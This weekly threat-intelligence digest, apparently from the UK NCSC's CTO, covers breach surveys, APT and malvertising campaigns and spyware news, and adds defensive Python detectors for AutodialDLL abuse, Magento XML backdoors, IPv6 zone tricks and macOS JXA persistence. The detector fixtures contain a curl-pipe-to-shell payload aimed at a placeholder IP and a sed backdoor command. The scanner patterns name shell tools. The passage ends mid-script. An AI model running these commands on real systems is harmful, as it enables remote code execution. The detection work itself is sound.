CTO at NCSC Summary: week ending April 14th
Vulnerabilities in security products continue to burn..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week ransomware continues to bite and vulnerabilities in security products continue to burn..
In the high-level this week:
Cyber Security Breaches Survey 2024 - UK Department for Science, Innovation and Technology - “By far the most common type of breach or attack is phishing (84% of businesses and 83% of charities). This is followed, to a much lesser extent, by others impersonating organisations in emails or online (35% of businesses and 37% of charities) and then viruses or other malware (17% of businesses and 14% of charities).”
Secure connected places playbook - UK Department for Science, Innovation and Technology - Resources to help local authorities (Government) secure their connected places ("smart cities") against cyber threats. This is the updated beta release.
The Cyber National Mission Force conducts missions to counter malicious cyberspace activities - US DoD - “supporting all aspects of our defend-the-nation mission set. CNMF personnel have deployed 22 times to 17 countries in partner-enabled, hunt forward operations that constrained adversary freedom of maneuver.”
ED 24-02: Mitigating the Significant Risk from Nation-State Compromise of Microsoft Corporate Email System - CISA - “Affected agencies that receive from Microsoft email metadata corresponding to known or suspected authentication compromises or become aware of specific details of such compromises shall take the following actions:
Take immediate remediation action for tokens, passwords, API keys, or other authentication credentials known or suspected to be compromised.”
Cyber Security Behaviour Tracker 2024 - Cert NZ - “In April 2022, CERT NZ conducted research to achieve a comprehensive measure of New Zealanders’ cyber security attitudes and behaviours.. Building on this insight, a 2023 survey was conducted to track how New Zealanders’ cyber security attitudes and behaviours are changing over time.”
Russia is trying to sabotage European railways, warns Prague - Financial Times reports - “České dráhy said it had “seen an increased number of cyber attacks on our digital infrastructure” and was “continuously strengthening” its cyber security.”
Project Agorá: central banks and banking sector embark on major project to explore tokenisation of cross-border payments - Bank for International Settlements - “The project builds on the unified ledger concept proposed by the BIS and will investigate how tokenised commercial bank deposits can be seamlessly integrated with tokenised wholesale central bank money in a public-private programmable core financial platform. This could enhance the functioning of the monetary system and provide new solutions using smart contracts and programmability, while maintaining its two-tier structure. “
Consultation on the Draft Cyber Industrial Strategy - Irish Government - “the NCSC (Ireland) undertook extensive consultation, inclusive of 19 structured interviews and 3 online workshops. This public consultation document seeks views from knowledgeable members of the public and stakeholders in cyber security and forms the next stage in the Strategy development.”
Lloyds Bank axes risk staff after executives complain they are a ‘blocker’ - reports the Financial Times - “less than half our workforce believe intelligent risk-taking is encouraged”.
EU Parliament votes to strengthen GDPR enforcement - EuroActiv reports - “The amendments to the GDPR Enforcement Procedures Regulation aim to enhance complainants’ rights, clarify enforcement procedures, and address procedural concerns, which German MEP and rapporteur Sergey Lagodinsky of the Greens said will bring legal clarity.” - legal text.
Ukrainian Hackers Launch Cyberattacks on Moscow Sewage System - Kyiv Post reports - “The Ukrainian intelligence-affiliated hacker group said they managed to shut off 87,000 sensors and prevent the utility company from responding to accidents and emergency events.” - this is the cyber dimension of modern conflict.
Unauthorized access to local government systems and vendor responsibilities Maebashi Judgment 5.2.17 (Ordinance 2 Wa 145) - from Japan report by Hatena - “A case in which a vendor was found to have been grossly negligent in an incident in which personal information was suspected to have leaked from a local government due to unauthorized access caused by a vulnerability caused by incorrect firewall settings.”
Crypto assets: Market structures and EU relevance - European Securities and Markets Authority - “Trading volumes are highly concentrated in a few crypto exchanges: Ten exchanges process about 90% of trades, and the largest exchange alone accounts for almost half of global trading volumes.”
Annual Report 2023: adaptability in a changing world - from the European Data Protection Supervisor - “The EDPS Annual Report 2023 presents the institution's demonstrated adaptability in the face of an evolving digital and regulatory landscape. The Report summarises key actions in the areas of Supervision & Enforcement, Policy & Consultation and Technology & Privacy. “
Vesuvius - Trading Update which quantifies the cost of a breach - “This good performance has been achieved despite the impact of the cyber incident that occurred earlier in the year, which we expect to have a cost impact of c. £3.5m.”
Defending Democracy
A new approach to the fight against disinformation - Ministry of Digitization in Poland reports - including “Shifting the focus from content analysis to behavioral patterns will allow for a more effective assessment of the scale of the phenomenon. The set of countermeasures will also be expanded; “
EU political parties promise to steer clear of deepfakes ahead of election - Politico reports
Reporting on/from China
People's Daily Harmony: Actively participate in and lead the global governance of artificial intelligence - China outlines its ambitions - “As a major country in artificial intelligence, China has the confidence and ability to further participate and play a leading role, work with all parties to uphold the concept of extensive consultation, joint contribution and shared benefits, work together to jointly promote artificial intelligence governance, and promote the reform of the global governance system in the right direction.”
2024 China-Africa Internet Development and Cooperation Forum Chairman’s Statement on China-Africa Artificial Intelligence Cooperation - “The 2024 China-Africa Internet Development and Cooperation Forum was held in Xiamen, China, from April 2 to 3, 2024, and conducted in-depth exchanges on China-Africa cooperation in artificial intelligence.”
China removes foreign ownership restrictions on more value-added telecom services - Geotechnopolitics reports - “On April 10, 2024, the Ministry of Industry and Information Technology issued the "Notice on Conducting Pilot Work for Further Opening Up the Value-Added Telecommunications Services" (referred to as Document No. 107). According to Document No. 107, restrictions on foreign ownership in value-added telecommunications services such as cloud services, internet access, data processing, and app stores will be lifted in pilot areas of Beijing, Shanghai, Hainan, and Shenzhen.”
Hainan's first "Satellite Super Factory" project is accelerated, - IT Home reports - “The factory is different from the satellites developed in the past. The main reason is that it is a batch production feature, and its annual production capacity can reach 1,000 satellites.”
Artificial intelligence
Laying the groundwork for US-China AI dialogue - The Brookings Institution - “The dialogue has demonstrated it is possible for U.S. and Chinese experts to narrow differences and puncture myths about each side’s approach to the employment of AI in national security. Both sides have developed shared understandings, for example, that the use of AI-enabled weapons systems should comport with the principles of customary and international law, particularly the principles of distinction and proportionality.”
IA : notre ambition pour la France - French Government - AI: our ambition for France
Cyber proliferation
Polish gov’t to notify some 30 people targeted by spyware - TVP World reports - “The Polish justice minister has announced that around 30 individuals are to be notified that they were surveilled by Pegasus spyware during the previous Law and Justice (PiS)-dominated government.”
Price of zero-day exploits rises as companies harden products against hackers - reports TechCrunch - … “is now offering between $5 million and $7 million for zero-days to break into iPhones; up to $5 million for zero-days to break into Android phones; up to $3 million and $3.5 million for Chrome and Safari zero-days, respectively; and $3 million to $5 million for WhatsApp and iMessage zero-days”
NSO Group embroiled in Paris-Baku information wars - reports Intelligence Online - ”The French ambassador to Armenia has again been the target of a disinformation campaign. A screenshot obtained by us indicates his phone may have been hacked by Israeli NSO Group's Pegasus spyware. This destabilisation operation forms part of a broader stand-off between France and Azerbaijan.”
NSO Transparency And Responsibility Report 2023 - from December 31st, 2023 - but worth a read.
NSO Group's 2023 Irresponsibility Report - An analysis of the above.
Israel Tried to Keep Sensitive Spy Tech Under Wraps. It Leaked Abroad - “The digital surveillance corporation Intellexa, which is owned by the former Israeli intelligence officer Tal Dilian, showcased a sensitive spying product that makes it possible to infect mobile phones like iPhones or Androids through online advertisements alone, according to documents seen by Haaretz and journalists in Greece.”
Challenges commercial surveillance vendors and exploit vendors are facing - how it looks from their side
Bounty Hunting
Our Commitment to Security: An Open Letter from Ivanti CEO Jeff Abbott - this is their Bill Gates: Trustworthy Computing memo. One might infer they have felt the business effects which has prompted this very public display.
No reflections this week..
Think someone else would benefit? Share:
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday..
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
Turla APT Targets Albania With Backdoor in Ongoing Campaign to Breach European Organizations
Aleksander W. Jarosz provides some high-level reporting here on alleged Russian interest. Insight is mostly victimology.
The targeting of Albania aligns with the regional interests of the APT campaign first described mid-February. This new activity provides additional intelligence into the possible scope of Russia-based APT operations, which has also included Poland in this campaign.
Reporting on China
Cyberespionage Group Earth Hundun's Continuous Refinement of Waterbear and Deuterbear
Cyris Tseng and Pierre Lee provide reporting on an alleged Chinese threat actor who shows a degree of technical sophistication in their operations. The defense evasion in this report is of note.
Earth Hundun is a cyberespionage-motivated threat actor that has been active for several years in the Asia-Pacific region, targeting the technology and government sectors.
The group has been known for employing several tools and techniques, including Waterbear, a malware entity that has had over 10 versions since 2009.
Waterbear is known for its complexity, as it uses a number of evasion mechanisms to minimize the chance of detection and analysis. Succeeding versions have added enhancements that make it even more troublesome to deal with.
In 2022, Earth Hundun began using the latest version of Waterbear — also known as Deuterbear — which has several changes, including anti-memory scanning and decryption routines, that make us consider it a different malware entity from the original Waterbear.
https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html
China tests US voter fault lines and ramps AI content to boost its geopolitical interests
Clint Watts provides reporting on alleged Chinese information operations. The scale is of note..
There has been an increased use of Chinese AI-generated content in recent months, attempting to influence and sow division in the U.S. and elsewhere on a range of topics including: the train derailment in Kentucky in November 2023, the Maui wildfires in August 2023, the disposal of Japanese nuclear wastewater, drug use in the U.S. as well as immigration policies and racial tensions in the country. There is little evidence these efforts have been successful in swaying opinion.
China’s geopolitical priorities remain unchanged but it has doubled down on its targets and increased the sophistication of its influence operations (IO) attacks. These priorities are:
The South Pacific islands
The South China Sea region
The U.S. defense industrial base
Messages between Chinese hackers show Australian Strategic Policy Institute is a target
James King of Australian publication The Nightly alleges Chinese interest and tasking of an alleged Chinese APT to go after ASPI. This should serve as a warning to similar institutions globally..
Chinese spymasters have identified Australia’s top security research institute as a priority target in their cyber-attack operations, with an investigation by The Nightly for the first time able to reveal messages between hackers that refer to our nation.
The group chat exchanges also offer a remarkable insight into the daily lives and frustrations of state-sponsored hackers working for China, including their dismay at being told they’re working too slowly while being tasked with disrupting “a big asset in two days”.
The Nightly investigation can reveal hackers working for the Chinese Government have been directed to target the Australian Strategic Policy Institute.
Withdrawing funding for the institute was among 14 demands to the Australian Government released by the Chinese embassy in 2020.
But The Nightly has discovered group chat messages on a social media channel exchanged between a hacker collective working for the Chinese Government.
The messages reveal a target list that includes ASPI — a think tank partly funded by Australia’s Department of Defence — among a range of other governmental organisations across the US and Taiwan.
The VPN installation package "leads the wolf into the house": the secret theft operation of the suspected Golden Eyed Dog (APT-Q-27) gang
Chinese reporting on malicious software being distributed to go after gambling. Phishing appears to be used historically by this threat actor. Note the other initial access mechanisms that are also used by this threat actor.
Golden Eye Dog is a hacker group that targets people engaged in gambling, dog pushing, and overseas Chinese groups in Southeast Asia. Its business scope covers remote control, mining, DDoS attacks, etc.
Attackers often spread these malicious applications and download links through various channels, such as search engine optimization or social media.
[We] discovered a malicious installation package disguised as Kuailian VPN during daily analysis and operation. After the installation package is run, in addition to releasing the Kuailian VPN installation software with normal signatures, it will also secretly implant a customized version of gh0st remote.
Reporting on North Korea
The United Nations alleges $3 billion of operations by North Korea in six years to fund weapons. This has been heavily reported previously; this is the aggregate reporting by the UN. Also shows that when financial sanctions bite some entities will adapt and overcome.
The Panel is investigating 58 suspected cyberattacks by the Democratic People’s Republic of Korea on cryptocurrency-related companies between 2017 and 2023, valued at approximately $3 billion, which reportedly help to fund the country’s development of weapons of mass destruction.
https://documents.un.org/doc/undoc/gen/n24/032/68/pdf/n2403268.pdf?token=MhrpbBFJJ1SPcyqqMp&fe=true
Reporting on Iran
Boggy Serpens use AutodialDLL function
Brad Duncan releases a TTP for this alleged Iranian threat actor. Of note is that Iran appears to continue to co-opt techniques detailed by red teamers in their offensive operations.
This Boggy Serpens activity appears to be based on an attack method documented by the Atomic Red Team
The AutodialDLL technique has been used for persistence in the wild by other threat actors.
But in this case, Boggy Serpens is using AutodialDLL to side-load the malicious DLL while relying on a scheduled task for persistence.
Persistence established through a scheduled task.
The scheduled task uses PowerShell commands to abuse the AutodialDLL technique.
PowerShell commands first update the AutodialDLL value in the Windows Registry, setting it to the malicious DLL.
PowerShell commands then side-load the malicious DLL by opening a hidden Internet Explorer window.
PowerShell commands finally reset the AutodialDLL value to its default settings to avoid other processes side-loading the DLL again.
The process repeats the next time the scheduled task runs.
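The set, load, reset loop above leaves a distinctive trace in registry telemetry. The following is an added detection example, not code from the Unit 42 report: it parses Sysmon Event ID 13 (RegistryEvent: value set) records in their message-text form and flags any non-default AutodialDLL value, plus the "set then reset shortly after by the same image" pairing the report describes. Assumptions: your Sysmon configuration logs SetValue on the WinSock2 Parameters key, and rasadhlp.dll is the baseline value on your build (verify against a known-good host). The three records are constructed, not real telemetry.

```python
import re
from datetime import datetime

# Registry value abused by the technique (under HKLM\System\CurrentControlSet\Services\WinSock2\Parameters).
AUTODIAL_SUFFIX = r"\services\winsock2\parameters\autodialdll"
# Assumption: the stock value on 64-bit Windows 10/11; confirm on a known-good host before relying on it.
DEFAULT_DLL = "rasadhlp.dll"

# Constructed Sysmon Event ID 13 message bodies (not real telemetry): set to a rogue DLL,
# reset to the default three seconds later by the same PowerShell process, then an unrelated write.
SAMPLE_LOG = r"""
Registry value set:
EventType: SetValue
UtcTime: 2024-04-10 09:00:01.123
ProcessId: 4212
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
Details: C:\ProgramData\update\helper.dll

Registry value set:
EventType: SetValue
UtcTime: 2024-04-10 09:00:04.500
ProcessId: 4212
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetObject: HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
Details: C:\Windows\System32\rasadhlp.dll

Registry value set:
EventType: SetValue
UtcTime: 2024-04-10 09:30:00.000
ProcessId: 1200
Image: C:\Windows\System32\svchost.exe
TargetObject: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive
Details: C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"""


def parse_sysmon_messages(text):
    """Split blank-line separated records and parse their 'Key: value' lines into dicts."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                fields[key.strip()] = value.strip()
        if fields:
            fields["_time"] = datetime.strptime(fields["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(fields)
    return events


def find_autodial_abuse(events, reset_window_s=300):
    """Flag non-default AutodialDLL writes and the set-then-reset pairing by the same image."""
    findings = []
    pending = {}  # Image -> the event that wrote a non-default DLL, awaiting its reset
    for ev in sorted(events, key=lambda e: e["_time"]):
        if ev.get("EventType") != "SetValue":
            continue
        if not ev.get("TargetObject", "").lower().endswith(AUTODIAL_SUFFIX):
            continue
        dll = ev.get("Details", "")
        if dll.lower().rsplit("\\", 1)[-1] != DEFAULT_DLL:
            findings.append({"kind": "nondefault_set", "image": ev["Image"],
                             "dll": dll, "time": ev["UtcTime"]})
            pending[ev["Image"]] = ev
        else:
            prior = pending.pop(ev["Image"], None)
            if prior is not None:
                gap = (ev["_time"] - prior["_time"]).total_seconds()
                if gap <= reset_window_s:
                    findings.append({"kind": "set_then_reset", "image": ev["Image"],
                                     "dll": prior["Details"], "seconds": gap})
    return findings


if __name__ == "__main__":
    for finding in find_autodial_abuse(parse_sysmon_messages(SAMPLE_LOG)):
        print(finding)
```

The reset is what makes this worth pairing: a lone non-default value could be a stale install, but a write followed minutes later by a restore to rasadhlp.dll from the same process is the technique's signature, and the scheduled task that drives it is the next pivot.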
Reporting on Other Actors
APT-C-43 (Machete) organization suspected of evolving into more diversified
Unattributed threat actor reporting from China on a Spanish speaking APT. The use of fake blogs in their tradecraft is of note..
It mainly conducts initial attacks through social engineering, using phishing emails or fake blogs.
The payload delivery method of the APT-C-43 organization has not changed significantly. It is mainly delivered through spear phishing emails and fake blogs. The phishing emails contain Office documents carrying malicious macro code. Once the macros are enabled, an FTP request is initiated to download a backdoor Trojan from a remote server and run it.
Starry Addax targets human rights defenders in North Africa with new malware
Unattributed threat actor here using social engineering to execute their mobile operations. The implant also has anti-emulations checks which are of note.
[We are] disclosing a new threat actor we deemed “Starry Addax” targeting mostly human rights activists associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.
Starry Addax conducts phishing attacks tricking their targets into installing malicious Android applications we’re calling “FlexStarling.”
For Windows-based targets, Starry Addax will serve credential-harvesting pages masquerading as login pages from popular media websites.
Starry Addax’s infrastructure can be used to target Windows- and Android-based users. This campaign's infection chain begins with a spear-phishing email sent to targets, consisting of individuals of interest to the attackers, especially human rights activists in Morocco and the Western Sahara region. The email contains content that requests the target to install the Sahrawi News Agency’s Mobile App or include a topical theme related to the Western Sahara.
https://blog.talosintelligence.com/starry-addax/
Muddled Libra’s Evolution to the Cloud
Margaret Zimmermann provides reporting on this criminal group also known as Scattered Spider. Note the targeting of administrators in institutions..
[We] have discovered that the Muddled Libra group now actively targets software-as-a-service (SaaS) applications and cloud service provider (CSP) environments.
Organizations often store a variety of data in SaaS applications and use services from CSPs. The threat actors have begun attempting to leverage some of this data to assist with their attack progression, and to use for extortion when trying to monetize their work.
Muddled Libra also uses the legitimate scalability and native functionality of CSP services to create new resources to assist with data exfiltration.
..
Muddled Libra purposefully targets administrative users during their social engineering attacks since those users have elevated permissions within identity providers, SaaS applications and organizations’ various CSP environments. After initial access, the group exploits identity providers to perform privilege escalation, by bypassing IAM restrictions and modifying permission sets associated with users to increase their scope of access.
https://unit42.paloaltonetworks.com/muddled-libra-evolution-to-cloud/
Smoke and (screen) mirrors: A strange signed backdoor
Andreas Klopsch shows that some actors were last year able to get malicious code signed through Microsoft processes.
The first variant contains a compilation time of 2023-01-05. We therefore assess that this campaign has been in development since at least January 2023
The second variant contains a compilation timestamp of 2023-01-11. This is also the first sample that managed to obtain a WHCP certificate
The third group of samples, with a compilation timestamp of 2023-03-19, were either signed by the WHCP certificate, or unsigned. Some of these samples are associated with the Laixi_Update_1.0.6.7_b.exe file mentioned above
The final group shares a compilation timestamp of 2023-10-08. Interestingly, two samples of this group were signed by a different signer, although as of this writing we haven’t been able to ascertain any further information on these signers, or identify any other samples signed by them.
https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
The New Version Of JsOutProx Is Attacking Financial Institutions In APAC And MENA Via GitLab Abuse
Criminal targeting of the financial sector in the middle-east. Phishing is the initial access vector.
[We] detected a new version of JSOutProx, targeting financial services and organizations in the APAC and MENA regions. JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET. It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim's machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target.
The spike in this activity was identified around February 8, 2024, when a major system integrator based in the Kingdom of Saudi Arabia reported an incident targeting customers of one of the major regional banks.
The actors employed a fake SWIFT payment notification (for enterprise customers) and a Moneygram template (for private customers), using misleading notifications to confuse victims and execute malicious code.
Persistent Magento backdoor hidden in XML
A novel criminal persistence technique here. Shows a degree of lateral thinking / novelty and a reminder that persistence can happen through data.
Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands. Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested. In this case, the command is sed, which adds a backdoor to the (automatically generated) CMS controller.
https://sansec.io/research/magento-xml-backdoor
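Because the persistence lives in layout XML rather than in a PHP file, file-integrity checks on the code base miss it. The following is an added hunting example, not code from the Sansec write-up, and the sample layout is constructed rather than the real payload: it walks a layout update and flags object-typed arguments that reference classes outside the namespaces a store expects (the report's case pulled in a vendor package, beberlei/assert, that has no business in a layout), and string arguments that look like shell commands. Assumptions: the allow-list of class prefixes is per deployment, and in Magento 2 the XML to feed it comes from layout files under app/design and from the xml column of the layout_update table.

```python
import re
import xml.etree.ElementTree as ET

XSI_TYPE = "{http://www.w3.org/2001/XMLSchema-instance}type"
# Assumption: class prefixes a layout update in this store may legitimately reference; tune per site.
ALLOWED_CLASS_PREFIXES = ("Magento\\",)
# Shell-like content that has no place inside a layout argument.
SHELL_HINTS = re.compile(r"(^|[\s;|&])(sed|sh|bash|php|curl|wget|base64)\b|/bin/|\$\(", re.I)

# Constructed layout update (not the payload from the report): one block carries an object
# argument from an unrelated vendor package and a string argument holding a sed command;
# the second block is ordinary.
SAMPLE_LAYOUT = r"""<?xml version="1.0"?>
<page xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <body>
    <referenceContainer name="content">
      <block class="Magento\Framework\View\Element\Template" name="cart.extra" template="Magento_Checkout::cart.phtml">
        <arguments>
          <argument name="helper" xsi:type="object">Assert\Assertion</argument>
          <argument name="cmd" xsi:type="string">sed -i 's/foo/bar/' app/code/Magento/Cms/Controller/Index/Index.php</argument>
        </arguments>
      </block>
      <block class="Magento\Checkout\Block\Cart" name="cart.totals">
        <arguments>
          <argument name="title" xsi:type="string">Cart totals</argument>
        </arguments>
      </block>
    </referenceContainer>
  </body>
</page>
"""


def scan_layout(xml_text):
    """Return (block name, finding kind, value) for suspicious blocks and arguments."""
    findings = []
    root = ET.fromstring(xml_text)
    for block in root.iter():
        if block.tag not in ("block", "referenceBlock"):
            continue
        name = block.get("name", "?")
        cls = block.get("class")
        if cls and not cls.startswith(ALLOWED_CLASS_PREFIXES):
            findings.append((name, "block-class", cls))
        for arg in block.iter("argument"):
            kind = arg.get(XSI_TYPE, "")
            text = (arg.text or "").strip()
            if kind == "object" and not text.startswith(ALLOWED_CLASS_PREFIXES):
                findings.append((name, "object-argument", text))
            elif kind == "string" and SHELL_HINTS.search(text):
                findings.append((name, "shell-like-string", text))
    return findings


if __name__ == "__main__":
    for finding in scan_layout(SAMPLE_LAYOUT):
        print(finding)
```

Any hit on the object-argument rule is worth a look even when no command string is present: the class name is the gadget, the argument only parameterises it. Pair the scan with a diff of the generated CMS controller against a clean checkout, since that file is where the sed in the report landed its backdoor.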
It Was Not Me! Malware-Initiated Vulnerability Scanning Is on the Rise
Beliz Kaleli, Fang Liu, Peng Peng, Alex Starov, Joey Allen and Stefan Springer provide some trend reporting which is of note if not a revelation.
Our telemetry indicates a growing number of threat actors are turning to malware-initiated scanning attacks. This article reviews how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans.
https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/
Malvertising
Gets its own little sub heading this week
Help us to take down the parasite website
A plea from an open source project..
https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/
Active Nitrogen campaign delivered via malicious ads for PuTTY, FileZilla
Jérôme Segura also highlights the challenge..
In the past couple of weeks, we have observed an ongoing campaign targeting system administrators with fraudulent ads for popular system utilities. The malicious ads are displayed as sponsored results on Google’s search engine page and localized to North America.
Victims are tricked into downloading and running the Nitrogen malware masquerading as a PuTTY or FileZilla installer. Nitrogen is used by threat actors to gain initial access to private networks, followed by data theft and the deployment of ransomware such as BlackCat/ALPHV.
We have reported this campaign to Google but no action has been taken yet.
Bing ad for NordVPN leads to SecTopRAT
Jérôme Segura again shows it isn’t just any one search engine.
We look at a very recent malvertising campaign impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.
The threat actors went ever further by trying to digitally sign a malicious installer as if they were the official vendor. Victims will have the impression they are getting NordVPN as it is part of the package, but will also inadvertently install a Remote Access Trojan known as SecTopRAT on their computer.
We have reported the malicious Bing ad to Microsoft, and other parts of the distribution infrastructure to their respective provider. We want to reiterate that NordVPN is a legitimate VPN provider and they are being impersonated by threat actors.
https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat
Discovery
How we find and understand the latent compromises within our environments.
M365 OAuth Apps: Malicious OAuth App Detections
Phill Moore is building out a catalogue which will be of use as it grows. Currently lists eight..
Detecting Command and Control frameworks via Sysmon and Windows Event Logging
Eric Conrad provides a walk through of the practice..
https://github.com/eric-conrad/c2-talk/
Exploring IPv6 Zone Identifier
Vsevolod Kokorin hints at the complexity in IPv6 parsers that we are going to have to contend with.
This article is dedicated to a series of tricks utilizing the modern capabilities of IPv6 and the shortcomings of address parser implementations in standard libraries of popular programming languages.
https://blog.slonser.info/posts/ipv6-zones/
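The practical risk is a filter that compares an address against a deny list while a zone identifier (and its URL encoding, where the delimiter is written %25) changes what the parser sees. The following is an added example, not code from the post: a canonicaliser that takes the host as it appears in the URL authority, decodes it exactly once, separates the zone, and then judges the bare address, with IPv4-mapped forms and zones on non-link-local addresses handled explicitly. It assumes Python 3.9 or later, where ipaddress accepts and exposes the scope_id; older versions reject zoned literals outright, which is itself a reason to test your filter on them.

```python
import ipaddress
from urllib.parse import unquote


def split_zone(host):
    """Take the host exactly as it appears in the URL authority (brackets and percent-encoding
    intact), decode it once (RFC 6874 writes the zone delimiter as %25), and return
    (address without zone, zone or None). Raises ValueError for anything that is not an IP literal."""
    h = host.strip()
    if h.startswith("[") and h.endswith("]"):
        h = h[1:-1]
    h = unquote(h)  # decode exactly once: a second pass would mangle numeric zones such as %12
    addr = ipaddress.ip_address(h)  # Python 3.9+ accepts "addr%zone" for IPv6 literals
    zone = None
    if isinstance(addr, ipaddress.IPv6Address) and addr.scope_id is not None:
        zone = addr.scope_id
        addr = ipaddress.IPv6Address(addr.packed)  # same 128 bits, zone dropped
    return addr, zone


def is_internal_literal(host):
    """True when the literal points at the host itself or a non-public range.
    Raises ValueError for a DNS name: resolve it and run every returned address through this."""
    addr, zone = split_zone(host)
    if zone is not None and not addr.is_link_local:
        return True  # a zone on a non-link-local address has no meaning; treat it as hostile
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_unspecified or addr.is_reserved)


if __name__ == "__main__":
    for h in ("[::1%25eth0]", "fe80::1%eth0", "[fe80::1%2512]", "[2606:4700::1111]",
              "::ffff:127.0.0.1", "[2606:4700::1111%25eth0]", "10.0.0.1"):
        print(h, "->", is_internal_literal(h))
```

The order matters: strip brackets, decode once, parse, then strip the zone, and only then compare. Comparing the raw string ("::1%25eth0" is not equal to "::1") or decoding twice are the two mistakes that let a zoned literal walk past a loopback check.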
PersistentJXA: Collection of macOS persistence methods in JXA
Leo Pitt and Matthew Conway provide some tooling/persistence techniques that if you run a macOS shop you will want to ensure coverage of.
MacOS Yosemite (10.10) introduced JXA. Its implementation allows users to control applications and the operating system using the JavaScript language. It can be invoked via osascript, a compiled script (.scpt), or a compiled Application (.app). Additionally, it can be leveraged in OSAKit from within other macho binaries without spawning the osascript binary.
https://github.com/D00MFist/PersistentJXA
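Of the invocation paths listed above, the osascript one is the easiest to hunt in launchd persistence. The following is an added example, not code from the PersistentJXA repository: it parses LaunchAgent/LaunchDaemon plists and reports jobs that run osascript with -l JavaScript, with an inline -e script, or with a script file, together with the launchd keys that make the job restart. The three plists are constructed, the directory list is an assumption about where launchd reads from, and the OSAKit-from-a-binary path the text mentions leaves no such plist trace and needs a different (binary inspection) approach.

```python
import glob
import os
import plistlib
import posixpath

# Assumption: where launchd loads per-user agents and system agents/daemons from.
LAUNCH_DIRS = ("~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons")
JXA_FLAG = ["-l", "JavaScript"]
SCRIPT_SUFFIXES = (".scpt", ".js", ".applescript")

# Constructed plists, not samples from the repository: an inline JXA agent with an Apple-looking
# label, an agent running a hidden compiled script, and an ordinary vendor daemon.
SAMPLE_PLISTS = {
    "~/Library/LaunchAgents/com.apple.softwareupdate.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/osascript</string>
    <string>-l</string><string>JavaScript</string>
    <string>-e</string>
    <string>var a = Application.currentApplication(); a.includeStandardAdditions = true; a.doShellScript('curl -s http://198.51.100.10/s | sh');</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>600</integer>
</dict>
</plist>""",
    "~/Library/LaunchAgents/com.example.backup.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/osascript</string>
    <string>/Users/alice/Library/Caches/.u/run.scpt</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>""",
    "/Library/LaunchDaemons/com.vendor.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.vendor.updater</string>
  <key>Program</key><string>/usr/local/bin/updater</string>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>""",
}


def jxa_findings(path, plist_bytes):
    """Return the reasons this launchd job looks like JXA persistence (empty list: nothing seen)."""
    d = plistlib.loads(plist_bytes)
    argv = list(d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else []))
    if not argv:
        return []
    reasons = []
    if posixpath.basename(argv[0]) == "osascript":
        if any(argv[i:i + 2] == JXA_FLAG for i in range(len(argv) - 1)):
            reasons.append("osascript -l JavaScript")
        if "-e" in argv:
            reasons.append("inline script via -e")
        scripts = [a for a in argv[1:] if a.endswith(SCRIPT_SUFFIXES)]
        if scripts:
            reasons.append("runs a script file: " + scripts[0])
    if reasons and d.get("RunAtLoad"):
        reasons.append("RunAtLoad")
    if reasons and (d.get("StartInterval") or d.get("KeepAlive")):
        reasons.append("re-runs (StartInterval/KeepAlive)")
    if reasons and path.startswith("~/") and posixpath.basename(path).startswith("com.apple."):
        reasons.append("Apple-looking label in a user LaunchAgent")
    return reasons


def hunt(plists):
    """Map path -> reasons for every plist that produced at least one finding."""
    out = {}
    for path, data in plists.items():
        reasons = jxa_findings(path, data)
        if reasons:
            out[path] = reasons
    return out


def load_from_disk(dirs=LAUNCH_DIRS):
    """Collect plist bytes from the launchd directories on a live macOS host."""
    found = {}
    for d in dirs:
        for p in glob.glob(os.path.join(os.path.expanduser(d), "*.plist")):
            with open(p, "rb") as fh:
                found[p] = fh.read()
    return found


if __name__ == "__main__":
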